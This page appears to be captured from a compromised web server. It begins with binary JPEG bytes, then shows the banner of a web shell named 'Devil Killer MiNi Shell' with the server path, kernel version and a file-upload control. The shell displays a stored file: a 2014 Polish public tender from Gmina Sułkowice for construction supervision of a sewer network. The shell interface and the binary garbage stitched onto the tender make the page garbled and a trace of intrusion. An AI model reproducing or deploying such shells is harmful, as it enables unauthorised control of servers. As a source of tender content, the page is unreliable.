JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140604/188264-N-2014.html

<p class="kh_header"><b>Sułkowice: Pełnienie nadzoru inwestorskiego w pełnym zakresie nad robotami budowlanymi pn.: Budowa sieci kanalizacji sanitarnej w Sułkowicach - etap VI</b><br>
<b>Numer ogłoszenia: 188264 - 2014; data zamieszczenia: 04.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sułkowice , ul. Rynek 1, 32-440 Sułkowice, woj. małopolskie, tel. 012 2732075, faks 012 2721422.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego w pełnym zakresie nad robotami budowlanymi pn.: Budowa sieci kanalizacji sanitarnej w Sułkowicach - etap VI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa pełnienia nadzoru inwestorskiego w pełnym zakresie nad robotami budowlanymi nad zadaniem Budowa sieci kanalizacji sanitarnej w Sułkowicach - etap VI.
2.Zamawiający wymaga aby w składzie zespołu specjalistów wchodziły  osoby posiadające uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach:
1)konstrukcyjno-budowlanej, 2)drogowej;3)instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych, w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, 4)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
3.Inspektorzy nadzoru rozpoczynają działalność od momentu podpisania umowy i rozpoczęcia ww. zadania do odbioru końcowego, w tym również w czasie rozruchu technologicznego, oddania obiektów do użytkowania oraz rozliczenia inwestycji z IW. 4.Nadzór inwestorski polegał będzie na:
1)pełnieniu w pełnym zakresie nadzoru inwestorskiego nad wszystkimi robotami dotyczącymi wyżej wymienionego zadania; 2)pełnieniu funkcji koordynatora inspektorów nadzoru w okresie realizacji przedmiotowej inwestycji.
5.Wykonawca wyznaczy osobę na koordynatora inspektorów nadzoru w okresie realizacji przedmiotowej inwestycji. 6.Do zadań inspektora nadzoru należy pełny zakres czynności określony poniżej, w tym wynikający z art. 25 i art. 26 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2013 r. , poz. 1409, ze zm.):
1)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej, 2)sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie, 3)sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, 4)uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania,
5)potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy, 6)wydawanie kierownikowi budowy lub kierownikowi robót polecenia, potwierdzonego wpisem do dziennika budowy, dotyczącego: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
7)wymaganie od Kierownika budowy rejestracji w Starostwie Powiatowym kolejnych tomów dziennika budowy, 8)żądanie od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę,9)wymaganie od Wykonawcy robót budowlanych wykonania poniższych czynności: a.wykonania i utrzymania zaplecza budowy, instalacji i zabudowań tymczasowych i wszystkich innych czynności niezbędnych do właściwej realizacji prac, b.zabezpieczenia i oznaczenia prowadzonych robót oraz dbania o stan techniczny i prawidłowość oznakowania prowadzonych prac przez cały czas realizacji robót, c.sporządzania dokumentacji fotograficznej z przebiegu aktualnie prowadzonych prac ze szczególnym uwzględnieniem robót zanikających i przedkładanie tej dokumentacji Zamawiającemu w formie elektronicznej, d.dokonania na koszt wykonawcy robót budowlanych stosownych korekt robót wraz z uzyskaniem niezbędnych decyzji, uzgodnień, itp. koniecznych do prawidłowego wykonania instalacji,
e.usunięcia przez wykonawcę robót budowlanych wszelkich wad i usterek w trakcie trwania robót w terminie nie dłuższym niż termin technicznie uzasadniony i konieczny do ich usunięcia, f.zabezpieczenia instalacji, urządzeń i obiektów na terenie robót i w jego bezpośrednim otoczeniu, przed ich zniszczeniem lub uszkodzeniem przez cały czas realizacji zadania, g.naprawy ewentualnych uszkodzeń urządzeń i obiektów oraz usuwania awarii powstałych w wyniku realizacji robót budowlanych, h.dbania o porządek na terenie robót oraz utrzymywania terenu robót w należytym stanie i porządku, składowania i usuwania wszelkich zbędnych materiałów, odpadów i śmieci oraz niepotrzebnych urządzeń prowizorycznych i pomocniczych, i.odtworzenia stanu pierwotnego nieruchomości, na których wykonywane były roboty budowlane - uporządkowanie terenu po zakończeniu robót, zaplecza budowy, jak również terenów sąsiadujących zajętych lub użytkowanych przez wykonawcę robót budowlanych; j.przestrzegania przepisów wynikających z ustawy - Prawo ochrony środowiska i ustawy o odpadach, k.realizowania robót budowlanych z uwzględnieniem warunków wynikających z uzgodnień dokonanych z podmiotami zarządzającymi nieruchomościami, obiektami lub urządzeniami (m. in. z ENION S.A. (Grupa TAURON),Małopolskim Zarządem Urządzeń Melioracji Wodnych w Krakowie, ZDW w Krakowie, ZDP w Myślenicach, UM Sułkowice),w tym sporządzania i przekazywania dokumentacji powykonawczej, zgłaszania rozpoczęcia i zakończenia prac w wymaganych terminach, uzgadniania szczegółowych warunków realizacji prac, wnoszenia koniecznych i wymaganych opłat, 9) weryfikacja dostarczonych przez wykonawcę robót budowlanych niezbędnych dokumentów potwierdzających parametry techniczne oraz wymagane atesty, certyfikaty, itp. stosowanych materiałów i urządzeń, w tym m. in. wyników oraz protokołów badań, sprawozdań i prób dot. realizacji robót budowlanych, 10) weryfikacja wszelkiej dostarczonej przez wykonawcę robót budowlanych dokumentacji kompletowanej w trakcie realizacji robót zgodnie z przepisami Prawa budowlanego i przepisami wykonawczymi do tej ustawy oraz przygotowanych do odbioru końcowego kompletów protokołów niezbędnych przy odbiorze, 11) weryfikowanie i zatwierdzanie sporządzonej przez wykonawcę robót budowlanych dokumentacji powykonawczej technicznej, 12) analizowanie harmonogramu robót, wnioskowanie do wykonawcy robót o jego korektę bądź zmianę i przedkładanie Zamawiającemu do zatwierdzenia,13) sprawowanie bieżącej kontroli zgodności wykonywanych robót budowlanych z harmonogramem rzeczowo - finansowym, 14) weryfikowanie i akceptowanie okresowych raportów wykonawcy robót budowlanych, 15) zatwierdzanie sporządzonego przez wykonawcę robót budowlanych planu realizacji robót wraz z planem zagospodarowania placu budowy, 16) informowanie Zamawiającego o terminie wykonania inspekcji telewizyjnej, zatwierdzanie sposobu kamerowania i protokolarne potwierdzanie zapisu z kamery poprawności wykonania robót budowlanych, 17) przestrzeganie zasad bezpieczeństwa, BHP, ppoż., 18) informowanie Zamawiającego o zgłoszonych przez wykonawcę robot budowlanych, problemach technicznych i innych problemach związanych z realizacją robót,
19) uczestniczenie w przeglądach gwarancyjnych wykonawcy robót, odbiorach robót budowlanych wykonanych w okresie gwarancyjnym wykonawcy robót budowlanych, 20) dokonywanie odbiorów częściowych, zanikających, końcowych, gwarancyjnych, pogwarancyjnych, 21) niezwłoczne powiadamianie Zamawiającego o wszelkich przerwach w realizacji robót, 22) sprawdzanie rozwiązań zamiennych,
23) koordynowanie wszelkich działań związanych z wykonywaniem przedmiotu zamówienia, 24) rozstrzyganie w porozumieniu z Kierownikiem Budowy wątpliwości natury technicznej wynikłe w toku wykonywania robót, w razie potrzeby zasięganie opinii odpowiedniego projektanta, 25) występowanie do Zamawiającego z wnioskiem o wprowadzenie w dokumentacji projektowej zmian i poprawek w terminie uzgodnionym z projektantem, w razie stwierdzenia w niej wad lub niedokładności albo konieczności wprowadzenia zmian w celu zastosowania innych rozwiązań konstrukcyjnych w przypadku wystąpienia utrudnień w realizacji zadania,
26) potwierdzanie wykonanych robót oraz usunięcia wad, 27) bieżące kontrolowanie prowadzenia dziennika budowy i dokonywanie odpowiednich wpisów,
28) podejmowanie decyzji i zasięganie opinii technicznych w imieniu Zamawiającego w zakresie wymaganym nin. umową, nie pociągających za sobą skutków finansowych, 29) niezwłoczne powiadamianie Zamawiającego o wszystkich robotach nie objętych umową, a koniecznych do wykonania ze względu na bezpieczeństwo lub zapobieżenie przed awarią, 30) nadzorowanie wymaganych przez Zamawiającego badań dotyczących jakości robót wykonanych przez wykonawcę robót budowlanych, 31) koordynowanie prowadzenia nadzoru autorskiego przez projektantów, stwierdzanie konieczności pobytu projektanta na budowie oraz potwierdzanie wykonania nadzoru, 32) podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) receptur, materiałów, prefabrykatów, w tym mieszanek mineralno - bitumicznych, betonów do wszystkich elementów, sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o przepisy normy oraz dokumentację projektową i Specyfikacje Techniczne, 33) uczestniczenia w kontrolach przeprowadzanych przez Nadzór Budowlany, przedstawicieli Instytucji Wdrażającej i inne organy uprawnione do kontroli oraz sprawdzanie realizacji ustaleń i decyzji podjętych podczas tych kontroli, 34) uczestniczenia w uzupełnianiu i składaniu informacji i dodatkowych wyjaśnień związanych z realizacją Projektu do Instytucji Wdrażającej w przypadku wystąpienia takiej potrzeby,
35) udzielania opinii i sprawdzania dokumentacji projektowej w zakresie przyjętych rozwiązań projektowych, ich wykonalności, Szczegółowych Specyfikacji Technicznych dla robót, technologii robót, zastosowania materiałów, itp., 36) potwierdzania dopuszczenia do pracy sprzętu, urządzeń i narzędzi przewidzianych do realizacji robót w oparciu o obowiązujące przepisy, normy techniczne i inne wymagania sformułowane w dokumentacji projektowej i Specyfikacjach Technicznych, a także w przepisach BHP i p/poż., 37) kontrolowania wykonania robót w zakresie zgodności z rysunkami, specyfikacjami i warunkami pozwolenia na budowę,38)wydawania poleceń wykonawcy robót do wykonania robót lub podjęcia niezbędnych przedsięwzięć jakie mogą być konieczne, aby uniknąć lub zmniejszyć ryzyko w przypadku jakiejkolwiek awarii mającej wpływ na bezpieczeństwo życia lub przylegającego majątku oraz powiadamianie o tym Zamawiającego, 39) organizowania narad roboczych przynajmniej raz w tygodniu, chyba, że Zamawiający zadecyduje inaczej, sporządzanie z nich protokołów z podjętymi ustaleniami i przekazywanie ich Zamawiającemu w terminie 1 dnia po naradzie oraz objazd inwestycji 1 raz w tygodniu wraz z przedstawicielami Zamawiającego,
40) przygotowywania i przekazywania Zamawiającemu we wskazanych przez niego terminach materiałów źródłowych do sporządzenia przez Zamawiającego projektu sprawozdań i dokumentów wynikających z umowy zawartej z Instytucją Wdrażającą w terminach umożliwiających Zamawiającemu wywiązanie się ze zobowiązań umownych, a także poświadczanie i opiniowanie dokumentów i sprawozdań przygotowywanych przez wykonawcę robót budowlanych tj. m.in.:
a.sporządzanie i aktualizowanie harmonogramu finansowania Inwestycji stanowiącego materiał źródłowy dla Zamawiającego do sporządzenia wniosków o płatność przez cały okres realizacji, b.sporządzanie miesięcznych sprawozdań (dla każdego zadania oddzielnie) o ewentualnych zagrożeniach powodujących zmiany w terminach i płatnościach, c.przygotowanie innych materiałów źródłowych, które będą niezbędne do właściwego prowadzenia przez Zamawiającego sprawozdawczości i rozliczeń w ramach procedur unijnych i wymagań Instytucji Wdrażającej, (dla każdego zadania oddzielnie) d.sprawozdanie końcowe z realizacji umowy dla każdego zadania oddzielnie. 41) sprawdzania kwartalnych zestawień wykonanych robót składanych przez wykonawcę robót i potwierdzenia ilości wykonanych robót i kwoty do wypłaty w terminie do 7 dni od złożenia zestawienia przez wykonawcę, 42) przyjmowania i opiniowania wniosków wykonawcy robót w sytuacji, kiedy wystąpi konieczność wykonania robót nieprzewidzianych w umowie, warunkujących zakończenie zadania inwestycyjnego, weryfikowanie kosztorysów ofertowych wykonawcy na powyższy zakres. Przekazywanie zaopiniowanych wniosków Zamawiającemu, 43) sporządzania protokołów konieczności na roboty dodatkowe i zamienne po uprzednim zaakceptowaniu ich przez Zamawiającego,
44) kontrolowania prawidłowego prowadzenia Dziennika Budowy i Ksiąg Obmiaru, prawidłowego gromadzenia atestów materiałów, orzeczeń o jakości materiałów, kontrolnych wyników badań i innych dokumentów stanowiących załączniki do odbioru robót, 45) stwierdzenia w miarę potrzeb zakończenia robót, przeprowadzenie odbioru robót z udziałem przedstawiciela Zamawiającego, sporządzenie listy ewentualnych usterek i wyznaczenie czasu do ich usunięcia przez Wykonawcę, 46) nadzorowania skompletowania 3 kompletów archiwalnych dokumentacji powykonawczej z wszystkimi wymaganymi rysunkami roboczymi i warsztatowymi, w tym jeden w wersji elektronicznej, 47) udziału w czynnościach odbioru końcowego i przekazaniu obiektów do użytkowania i eksploatacji, 48) nadzoru nad zapewnieniem bezpieczeństwa i przestrzegania przepisów p. pożarowych, bezpieczeństwa i higieny pracy, przez wszystkich uczestników procesu realizacji Inwestycji w rozumieniu wymagań stawianych przez prawo budowlane i inne obowiązujące przepisy, podczas całego procesu realizacji Inwestycji, 49) sprawdzanie kompletności i prawidłowości dokumentacji powykonawczej, 50) dokonywania czynności sprawdzania wycen i kalkulacji robót przedkładanych przez Wykonawców Inwestycji oraz sprawdzanie i zatwierdzanie w terminie 7 dni od dnia dostarczenia faktur Wykonawców, a także dokumentów, które będą załącznikami do tych faktur (w tym protokołów odbioru) pod względem merytorycznym oraz rachunkowym, 51) prowadzenie i archiwizacji korespondencji i dokumentacji zadania inwestycyjnego i przekazanie ich Zamawiającemu w stanie kompletnym po zakończeniu Inwestycji, 52) sporządzanie comiesięcznych raportów z nadzorowanych robót - na żądanie Zamawiającego lub Instytucji Wdrażającej na zasadach określonych przez Instytucję Wdrażającą, 53) współdziałanie (na wezwanie Zamawiającego) z instytucjami nadzorującymi wdrażanie oraz kontrolującymi realizację Programu zaopatrzenia w wodę oraz odprowadzenia i oczyszczenia ścieków w gminie Sułkowice - etap I, 54) przygotowanie rozliczeń związanych z realizacją inwestycji Programu Operacyjnego Infrastruktura i Środowisko na lata 2007-2013, 55) udziału w opracowywaniu raportów, sprawozdań okresowych i wniosków o płatność dla Programu Operacyjnego Infrastruktura i Środowisko na lata 2007-2013, 56) uczestniczenie w spotkaniach roboczych i naradach koordynacyjnych, w tym również stawienie się na wezwanie Zamawiającego na placu budowy lub w siedzibie Urzędu Miejskiego w ciągu nie później niż 24 godziny od wezwania, 57) posiadanie podczas wykonywania przedmiotu zamówienia aktywnego i działającego numeru telefonu oraz faxu, adresu poczty elektronicznej, a wszyscy inspektorzy nadzoru posiadanie aktywnych i działających numerów telefonów komórkowych, 7.Bez zgody Zamawiającego Inspektor Nadzoru nie jest upoważniony do wydania wykonawcy polecenia wykonania robót dodatkowych lub zamiennych. 8.Jeżeli zajdzie konieczność wykonania robót niezbędnych ze względu na bezpieczeństwo lub zabezpieczenie mienia przed awarią, Zamawiający upoważni Inspektora Nadzoru do udzielenia Wykonawcy zlecenia na ich wykonanie wpisem w dzienniku budowy w jego imieniu, zaś Inspektor Nadzoru zawiadomi o tym Zamawiającego w terminie do 24 godzin od daty dokonania tego wpisu. 9.Inspektor nadzoru jest w granicach posiadanego umocowania wynikającego z zawartej umowy, przedstawicielem Zamawiającego na budowie, a godziny pracy Inspektora nadzoru będą dostosowane do czasu pracy wykonawcy robót. 10.Zamawiający wymaga, aby usługa nadzoru inwestorskiego pełniona była bez dodatkowego wynagrodzenia również:
a) w odbiorze gwarancyjnym i odbiorze pogwarancyjnym wraz z nadzorowaniem robót budowlanych w przypadku konieczności wykonania i sprawdzenia poprawności usuniętych wad,
b) nad robotami dodatkowymi w przypadku ich wystąpienia.
11.Szczegółowy zakres robót budowlanych objętych nadzorem inwestorskim stanowiącym przedmiot niniejszego postępowania ujęty został w dokumentacji technicznej dotyczącej zadania, która zostanie przekazana Wykonawcy w wersji elektronicznej..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie  zamówień  uzupełniających, o których mowa w art.67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych do wysokości 10% wartości 	zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść wadium.
2)Zamawiający wymaga złożenia wadium w wysokości 2.000,00 zł (słownie: dwa tysiące złotych, 00/100 ).
3)Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz.1158 z póź. zm.).
4)Wadium w formie pieniężnej winno być wniesione przelewem na konto Zamawiającego na  następujący rachunek bankowy: BSR O/Sułkowice  75 85890006 0170 0000 0068 0016. W terminie otwarcia ofert wadium wpłacane w formie pieniężnej musi znajdować się na koncie zamawiającego. Potwierdzenie wniesienia wadium w formie pieniężnej należy dołączyć do oferty.
5)Inna niż pieniężna forma wadium, powinna być złożona w oryginale jako odrębny załącznik do oferty, umożliwiający łatwe oddzielenie od pozostałych dokumentów ofertowych lub w Kasie Urzędu Miejskiego w Sułkowicach  tj. 32-440 Sułkowice, Rynek 1 (sala obsługi klienta), w godzinach pracy Urzędu. W przypadku wadium wnoszonego w poręczeniach lub gwarancjach data wygaśnięcia poręczenia lub gwarancji musi obejmować co najmniej 30 dniowy termin związania z ofertą.
6)Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa.
7)Wykonawca, którego oferta nie będzie zabezpieczona prawidłowo wniesionym wadium zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, jeżeli Wykonawca złoży oświadczenie, że spełnia warunki udziału w postępowaniu, o którym mowa w art. 22 ust.1;
Ocena spełnienia warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu - zgodnie z treścią załącznika nr 1 do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli Wykonawca wykaże, iż w okresie ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał: nie mniej niż jedną usługę sprawowania nadzoru inwestorskiego lub kierowania robotami budowlanymi polegającymi na budowie  kanalizacji o długości co najmniej 10 km.
oświadczenia o spełnianiu warunków udziału w postępowaniu, 
wykazu zrealizowanych usług, którego wzór zawiera załącznik nr 3 do oferty, ( w Wykazie usług Wykonawca zobowiązany jest wskazać informacje o wykonanych przez siebie usługach, które spełniają wymagania określone w SIWZ);
dowodów dotyczących głównych usług, określających czy zostały wykonane lub są wykonywane należycie ( Wykonawca samodzielnie ustala, które usługi uznaje za główne i tylko dla tych usług  przedstawia dowody)
pisemnego zobowiązania innego podmiotu do udostępnienia zasobów (wiedzy i doświadczenia), niezbędnych do wykonania zamówienia   ( jeżeli dotyczy).
Dowodami, o których mowa powyżej są:
a)poświadczenie; z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
b)oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi, wykazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykonawca wykaże, że  dysponuje lub będzie dysponował zespołem specjalistów  - posiadających następujące uprawnienia:
a)Inspektor nadzoru robót sanitarnych - posiadający następujące 	kwalifikacje i doświadczenie: co najmniej 2 lat doświadczenia na stanowisku inspektora nadzoru lub kierownika budowy/robót w danej specjalności, posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2013, poz. 1409, ze zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578, ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do nadzorowania robót budowlanych w zakresie co najmniej specjalności instalacyjno - inżynieryjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych.
